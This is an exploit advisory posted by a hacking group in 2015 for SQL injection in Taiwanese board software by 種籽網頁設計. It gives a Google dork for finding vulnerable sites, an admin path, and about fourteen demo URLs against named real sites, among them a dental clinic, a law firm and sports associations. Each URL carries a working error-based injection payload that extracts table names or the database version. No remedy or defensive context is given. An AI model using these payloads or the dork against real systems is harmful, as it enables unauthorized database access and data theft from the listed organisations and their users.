######################
# Exploit Title : Design By 種籽網頁設計 SQL injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.e-seed.com.tw/
# Google Dork : site:.tw inurl:board.php? stx=
# Date: 26 Dec 2015
# Tested On : Win 10 / Google Chrome
#
######################
# adminpage= target/adm/
#
# demos :
# http://www.chain-dent.com.tw/bbs/board.php?bo_table=dental&page=1&sfl=1'&sod=desc&sop=and&sst=40(SELECT 1 from(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(table_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+-
# http://sun-wang.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://hsu-design.com/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://pentathlon.org.tw/bbs/board.php?bo_table=links&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.shootingsport.org.tw/bbs/board.php?bo_table=link&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.in-motel.com.tw/bbs/board.php?bo_table=room&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.flower888.com.tw/bbs/board.php?bo_table=special&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.tw-sd.com/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.su-attorneys.com.tw/bbs/board.php?bo_table=legal&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.e-topway.com.tw/bbs/board.php?bo_table=product&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.wtd.com.tw/bbs/board.php?bo_table=building&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://home-light.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
# http://www.cscsignal.com.tw/bbs/board.php?bo_table=qa&page=1&sfl=&sod=desc&sop=and&sst=40,(SELECT%201%20from(SELECT%20COUNT(*),CONCAT((SELECT%20(SELECT%20(SELECT%20DISTINCT%20CONCAT(0x7e,0x27,CAST(version()%20AS%20CHAR),0x27,0x7e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1))%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+-
######################
# discovered by : modiret
######################